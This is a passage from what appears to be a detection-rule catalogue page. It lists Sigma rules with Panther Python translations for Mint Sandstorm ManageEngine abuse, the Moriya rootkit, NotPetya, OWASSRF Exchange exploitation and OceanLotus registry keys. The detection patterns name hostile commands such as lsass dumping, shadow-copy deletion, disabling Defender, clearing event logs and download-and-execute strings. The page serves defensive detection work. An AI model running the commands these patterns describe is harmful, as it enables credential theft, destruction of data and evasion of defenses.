                                            in event.deep_get("CommandLine", default=""),
                                            "usoshared"
                                            in event.deep_get("CommandLine", default=""),
                                            "whoami" in event.deep_get("CommandLine", default=""),
                                        ]
                                    ),
                                    # Sigma's |re modifier is unanchored, so re.search is the
                                    # correct translation (re.match would only test the start of
                                    # the command line); a raw string needs a single backslash
                                    # for \s, since r"\\s" matches a literal backslash plus "s".
                                    re.search(
                                        r"[-/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+/=]{15,}",
                                        event.deep_get("CommandLine", default=""),
                                    ),
                                    re.search(
                                        r"net\s+user", event.deep_get("CommandLine", default="")
                                    ),
                                    re.search(
                                        r"net\s+group", event.deep_get("CommandLine", default="")
                                    ),
                                    re.search(
                                        r"query\ssession",
                                        event.deep_get("CommandLine", default=""),
                                    ),
                                ]
                            ),
                        ]
                    ),
                    all(
                        [
                            "lsass" in event.deep_get("CommandLine", default=""),
                            any(
                                [
                                    "procdump" in event.deep_get("CommandLine", default=""),
                                    "tasklist" in event.deep_get("CommandLine", default=""),
                                    "findstr" in event.deep_get("CommandLine", default=""),
                                ]
                            ),
                        ]
                    ),
                    any(
                        [
                            all(
                                [
                                    event.deep_get("Image", default="").endswith("\\wget.exe"),
                                    "http" in event.deep_get("CommandLine", default=""),
                                ]
                            ),
                            all(
                                [
                                    event.deep_get("Image", default="").endswith("\\curl.exe"),
                                    "http" in event.deep_get("CommandLine", default=""),
                                ]
                            ),
                            any(
                                [
                                    "E:jscript" in event.deep_get("CommandLine", default=""),
                                    "e:vbscript" in event.deep_get("CommandLine", default=""),
                                ]
                            ),
                            all(
                                [
                                    "localgroup Administrators"
                                    in event.deep_get("CommandLine", default=""),
                                    "/add" in event.deep_get("CommandLine", default=""),
                                ]
                            ),
                            all(
                                [
                                    "net" in event.deep_get("CommandLine", default=""),
                                    "user" in event.deep_get("CommandLine", default=""),
                                    "/add" in event.deep_get("CommandLine", default=""),
                                ]
                            ),
                            any(
                                [
                                    all(
                                        [
                                            "reg add" in event.deep_get("CommandLine", default=""),
                                            "DisableAntiSpyware"
                                            in event.deep_get("CommandLine", default=""),
                                            "\\Microsoft\\Windows Defender"
                                            in event.deep_get("CommandLine", default=""),
                                        ]
                                    ),
                                    all(
                                        [
                                            "reg add" in event.deep_get("CommandLine", default=""),
                                            "DisableRestrictedAdmin"
                                            in event.deep_get("CommandLine", default=""),
                                            "CurrentControlSet\\Control\\Lsa"
                                            in event.deep_get("CommandLine", default=""),
                                        ]
                                    ),
                                ]
                            ),
                            all(
                                [
                                    "wmic" in event.deep_get("CommandLine", default=""),
                                    "process call create"
                                    in event.deep_get("CommandLine", default=""),
                                ]
                            ),
                            all(
                                [
                                    "wmic" in event.deep_get("CommandLine", default=""),
                                    "delete" in event.deep_get("CommandLine", default=""),
                                    "shadowcopy" in event.deep_get("CommandLine", default=""),
                                ]
                            ),
                            all(
                                [
                                    "vssadmin" in event.deep_get("CommandLine", default=""),
                                    "delete" in event.deep_get("CommandLine", default=""),
                                    "shadows" in event.deep_get("CommandLine", default=""),
                                ]
                            ),
                            all(
                                [
                                    "wbadmin" in event.deep_get("CommandLine", default=""),
                                    "delete" in event.deep_get("CommandLine", default=""),
                                    "catalog" in event.deep_get("CommandLine", default=""),
                                ]
                            ),
                        ]
                    ),
                ]
            ),
            not all(
                [
                    "download.microsoft.com" in event.deep_get("CommandLine", default=""),
                    "manageengine.com" in event.deep_get("CommandLine", default=""),
                    "msiexec" in event.deep_get("CommandLine", default=""),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Mint Sandstorm - ManageEngine Suspicious Process Execution
id: 58d8341a-5849-44cd-8ac8-8b020413a31b
status: test
description: Detects suspicious execution from ManageEngine as seen used by Mint Sandstorm
references:
    - https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/
author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea)
date: 2023-04-20
modified: 2025-10-19
tags:
    - attack.execution
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent_path:
        ParentImage|contains:
            - 'manageengine'
            - 'ServiceDesk'
    selection_parent_image:
        ParentImage|contains: '\java'
    selection_special_child_powershell_img:
        Image|endswith:
            - '\powershell.exe'
            - '\powershell_ise.exe'
    selection_special_child_powershell_cli:
        - CommandLine|contains:
              - ' echo '
              - '-dumpmode'
              - '-ssh'
              - '.dmp'
              - 'add-MpPreference'
              - 'adscredentials'
              - 'bitsadmin'
              - 'certutil'
              - 'csvhost.exe'
              - 'DownloadFile'
              - 'DownloadString'
              - 'dsquery'
              - 'ekern.exe'
              - 'FromBase64String'
              - 'iex '
              - 'iex('
              - 'Invoke-Expression'
              - 'Invoke-WebRequest'
              - 'localgroup administrators'
              - 'o365accountconfiguration'
              - 'samaccountname='
              - 'set-MpPreference'
              - 'svhost.exe'
              - 'System.IO.Compression'
              - 'System.IO.MemoryStream'
              - 'usoprivate'
              - 'usoshared'
              - 'whoami'
        - CommandLine|re: '[-/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+/=]{15,}'
        - CommandLine|re: 'net\s+user'
        - CommandLine|re: 'net\s+group'
        - CommandLine|re: 'query\ssession'
    selection_special_child_lsass_1:
        CommandLine|contains: 'lsass'
    selection_special_child_lsass_2:
        CommandLine|contains:
            - 'procdump'
            - 'tasklist'
            - 'findstr'
    selection_child_wget:
        Image|endswith: '\wget.exe'
        CommandLine|contains: 'http'
    selection_child_curl:
        Image|endswith: '\curl.exe'
        CommandLine|contains: 'http'
    selection_child_script:
        CommandLine|contains:
            - 'E:jscript'
            - 'e:vbscript'
    selection_child_localgroup:
        CommandLine|contains|all:
            - 'localgroup Administrators'
            - '/add'
    selection_child_net:
        CommandLine|contains: 'net' # Covers net1
        CommandLine|contains|all:
            - 'user'
            - '/add'
    selection_child_reg:
        - CommandLine|contains|all:
              - 'reg add'
              - 'DisableAntiSpyware'
              - '\Microsoft\Windows Defender'
        - CommandLine|contains|all:
              - 'reg add'
              - 'DisableRestrictedAdmin'
              - 'CurrentControlSet\Control\Lsa'
    selection_child_wmic_1:
        CommandLine|contains|all:
            - 'wmic'
            - 'process call create'
    selection_child_wmic_2:
        CommandLine|contains|all:
            - 'wmic'
            - 'delete'
            - 'shadowcopy'
    selection_child_vssadmin:
        CommandLine|contains|all:
            - 'vssadmin'
            - 'delete'
            - 'shadows'
    selection_child_wbadmin:
        CommandLine|contains|all:
            - 'wbadmin'
            - 'delete'
            - 'catalog'
    filter_main:
        CommandLine|contains|all:
            - 'download.microsoft.com'
            - 'manageengine.com'
            - 'msiexec'
    condition: all of selection_parent_* and (all of selection_special_child_powershell_* or all of selection_special_child_lsass_* or 1 of selection_child_*) and not filter_main
falsepositives:
    - Unlikely
level: critical
critical
Moriya Rootkit - System
Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report
status test author Bhabesh Raj id 25b9c01c-350d-4b95-bed1-836d04a4f324
panther query
def rule(event):
    if all(
        [
            event.deep_get("Provider_Name", default="") == "Service Control Manager",
            event.deep_get("EventID", default="") == 7045,
            event.deep_get("ServiceName", default="") == "ZzNetSvc",
        ]
    ):
        return True
    return False
view Sigma YAML
title: Moriya Rootkit - System
id: 25b9c01c-350d-4b95-bed1-836d04a4f324
status: test
description: Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report
references:
    - https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831
author: Bhabesh Raj
date: 2021-05-06
modified: 2022-11-29
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.t1543.003
logsource:
    product: windows
    service: system
detection:
    selection:
        Provider_Name: 'Service Control Manager'
        EventID: 7045
        ServiceName: ZzNetSvc
    condition: selection
falsepositives:
    - Unknown
level: critical
critical
Moriya Rootkit File Created
Detects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in the securelist's Operation TunnelSnake report.
status test author Bhabesh Raj id a1507d71-0b60-44f6-b17c-bf53220fdd88
panther query
def rule(event):
    if (
        event.deep_get("TargetFilename", default="")
        == "C:\\Windows\\System32\\drivers\\MoriyaStreamWatchmen.sys"
    ):
        return True
    return False
view Sigma YAML
title: Moriya Rootkit File Created
id: a1507d71-0b60-44f6-b17c-bf53220fdd88
related:
    - id: 25b9c01c-350d-4b95-bed1-836d04a4f324
      type: derived
status: test
description: Detects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in the securelist's Operation TunnelSnake report.
references:
    - https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831
author: Bhabesh Raj
date: 2021-05-06
modified: 2023-05-05
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.t1543.003
    - detection.emerging-threats
logsource:
    product: windows
    category: file_event
detection:
    selection:
        TargetFilename: 'C:\Windows\System32\drivers\MoriyaStreamWatchmen.sys'
    condition: selection
falsepositives:
    - Unknown
level: critical
critical
NotPetya Ransomware Activity
Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil
status test author Florian Roth (Nextron Systems), Tom Ueltschi id 79aeeb41-8156-4fac-a0cd-076495ab82a1
panther query
import json


def rule(event):
    if any(
        [
            any(
                [
                    "wevtutil cl Application & fsutil usn deletejournal /D C:"
                    in event.deep_get("CommandLine", default=""),
                    "dllhost.dat %WINDIR%\\ransoms" in event.deep_get("CommandLine", default=""),
                ]
            ),
            all(
                [
                    event.deep_get("Image", default="").endswith("\\rundll32.exe"),
                    any(
                        [
                            event.deep_get("CommandLine", default="").endswith(".dat,#1"),
                            event.deep_get("CommandLine", default="").endswith(".dat #1"),
                            event.deep_get("CommandLine", default="").endswith('.zip.dll",#1'),
                        ]
                    ),
                ]
            ),
            "\\perfc.dat" in json.dumps(event.to_dict()),
        ]
    ):
        return True
    return False
view Sigma YAML
title: NotPetya Ransomware Activity
id: 79aeeb41-8156-4fac-a0cd-076495ab82a1
status: test
description: Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil
references:
    - https://securelist.com/schroedingers-petya/78870/
    - https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100
author: Florian Roth (Nextron Systems), Tom Ueltschi
date: 2019-01-16
modified: 2022-12-15
tags:
    - attack.stealth
    - attack.defense-impairment
    - attack.t1218.011
    - attack.t1685.005
    - attack.credential-access
    - attack.t1003.001
    - car.2016-04-002
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_specific_pattern:
        CommandLine|contains:
            - 'wevtutil cl Application & fsutil usn deletejournal /D C:'
            - 'dllhost.dat %WINDIR%\ransoms'
    selection_rundll32:
        Image|endswith: '\rundll32.exe'
        CommandLine|endswith:
            - '.dat,#1'
            - '.dat #1' # Sysmon removes comma
            - '.zip.dll",#1'
    selection_perfc_keyword:
        - '\perfc.dat'
    condition: 1 of selection_*
falsepositives:
    - Unknown
level: critical
critical
OWASSRF Exploitation Attempt Using Public POC - Proxy
Detects exploitation attempt of the OWASSRF variant targeting exchange servers using publicly available POC. It uses the OWA endpoint to access the powershell backend endpoint
status test author Nasreddine Bencherchali (Nextron Systems) id fdd7e904-7304-4616-a46a-e32f917c4be4
panther query
def rule(event):
    if all(
        [
            event.deep_get("c-useragent", default="")
            == "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36",
            event.deep_get("cs-method", default="") == "POST",
            event.deep_get("sc-status", default="") == 200,
            "/owa/mastermailbox" in event.deep_get("c-uri", default=""),
            "/powershell" in event.deep_get("c-uri", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: OWASSRF Exploitation Attempt Using Public POC - Proxy
id: fdd7e904-7304-4616-a46a-e32f917c4be4
status: test
description: Detects exploitation attempt of the OWASSRF variant targeting exchange servers using publicly available POC. It uses the OWA endpoint to access the powershell backend endpoint
references:
    - https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/
    - https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/
    - https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-12-22
tags:
    - attack.initial-access
    - attack.t1190
    - detection.emerging-threats
logsource:
    category: proxy
detection:
    selection:
        # Look for the header: X-OWA-ExplicitLogonUser: owa/[email protected]
        c-useragent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36'
        cs-method: 'POST'
        sc-status: 200
        c-uri|contains|all:
            - '/owa/mastermailbox'
            - '/powershell'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
OWASSRF Exploitation Attempt Using Public POC - Webserver
Detects exploitation attempt of the OWASSRF variant targeting exchange servers using publicly available POC. It uses the OWA endpoint to access the powershell backend endpoint
status test author Nasreddine Bencherchali (Nextron Systems) id 92d78c63-5a5c-4c40-9b60-463810ffb082
panther query
def rule(event):
    if all(
        [
            event.deep_get("cs-user-agent", default="")
            == "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36",
            event.deep_get("cs-method", default="") == "POST",
            event.deep_get("sc-status", default="") == 200,
            "/owa/mastermailbox" in event.deep_get("cs-uri-query", default=""),
            "/powershell" in event.deep_get("cs-uri-query", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: OWASSRF Exploitation Attempt Using Public POC - Webserver
id: 92d78c63-5a5c-4c40-9b60-463810ffb082
status: test
description: Detects exploitation attempt of the OWASSRF variant targeting exchange servers using publicly available POC. It uses the OWA endpoint to access the powershell backend endpoint
references:
    - https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/
    - https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/
    - https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-12-22
modified: 2023-01-02
tags:
    - attack.initial-access
    - attack.t1190
    - detection.emerging-threats
logsource:
    category: webserver
detection:
    selection:
        # Look for the header: X-OWA-ExplicitLogonUser: owa/[email protected]
        cs-user-agent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36'
        cs-method: 'POST'
        sc-status: 200
        cs-uri-query|contains|all:
            - '/owa/mastermailbox'
            - '/powershell'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
OceanLotus Registry Activity
Detects registry keys created in OceanLotus (also known as APT32) attacks
status test author megan201296, Jonhnathan Ribeiro id 4ac5fc44-a601-4c06-955b-309df8c4e9d4
panther query
def rule(event):
    if any(
        [
            "\\SOFTWARE\\Classes\\CLSID\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\Model"
            in event.deep_get("TargetObject", default=""),
            any(
                [
                    "Classes\\AppXc52346ec40fb4061ad96be0e6cb7d16a\\"
                    in event.deep_get("TargetObject", default=""),
                    "Classes\\AppX3bbba44c6cae4d9695755183472171e2\\"
                    in event.deep_get("TargetObject", default=""),
                    "Classes\\CLSID\\{E3517E26-8E93-458D-A6DF-8030BC80528B}\\"
                    in event.deep_get("TargetObject", default=""),
                    "Classes\\CLSID\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\Model"
                    in event.deep_get("TargetObject", default=""),
                ]
            ),
            all(
                [
                    "\\SOFTWARE\\App\\" in event.deep_get("TargetObject", default=""),
                    any(
                        [
                            "AppXbf13d4ea2945444d8b13e2121cb6b663\\"
                            in event.deep_get("TargetObject", default=""),
                            "AppX70162486c7554f7f80f481985d67586d\\"
                            in event.deep_get("TargetObject", default=""),
                            "AppX37cc7fdccd644b4f85f4b22d5a3f105a\\"
                            in event.deep_get("TargetObject", default=""),
                        ]
                    ),
                    any(
                        [
                            event.deep_get("TargetObject", default="").endswith("Application"),
                            event.deep_get("TargetObject", default="").endswith("DefaultIcon"),
                        ]
                    ),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: OceanLotus Registry Activity
id: 4ac5fc44-a601-4c06-955b-309df8c4e9d4
status: test
description: Detects registry keys created in OceanLotus (also known as APT32) attacks
references:
    - https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/
    - https://github.com/eset/malware-ioc/tree/master/oceanlotus
author: megan201296, Jonhnathan Ribeiro
date: 2019-04-14
modified: 2023-09-28
tags:
    - attack.persistence
    - attack.defense-impairment
    - attack.t1112
    - detection.emerging-threats
logsource:
    category: registry_event
    product: windows
detection:
    selection_clsid:
        TargetObject|contains: '\SOFTWARE\Classes\CLSID\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\Model'
    selection_hkcu:
        TargetObject|contains:
            # HKCU\SOFTWARE\Classes\AppXc52346ec40fb4061ad96be0e6cb7d16a\
            - 'Classes\AppXc52346ec40fb4061ad96be0e6cb7d16a\'
            # HKCU\SOFTWARE\Classes\AppX3bbba44c6cae4d9695755183472171e2\
            - 'Classes\AppX3bbba44c6cae4d9695755183472171e2\'
            # HKCU\SOFTWARE\Classes\CLSID\{E3517E26-8E93-458D-A6DF-8030BC80528B}\
            - 'Classes\CLSID\{E3517E26-8E93-458D-A6DF-8030BC80528B}\'
            - 'Classes\CLSID\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\Model'
    selection_appx_1:
        TargetObject|contains: '\SOFTWARE\App\'
    selection_appx_2:
        TargetObject|contains:
            - 'AppXbf13d4ea2945444d8b13e2121cb6b663\'
            - 'AppX70162486c7554f7f80f481985d67586d\'
            - 'AppX37cc7fdccd644b4f85f4b22d5a3f105a\'
        TargetObject|endswith:
            - 'Application'
            - 'DefaultIcon'
    condition: selection_clsid or selection_hkcu or all of selection_appx_*
falsepositives:
    - Unknown
level: critical
Showing 51-100 of 3,750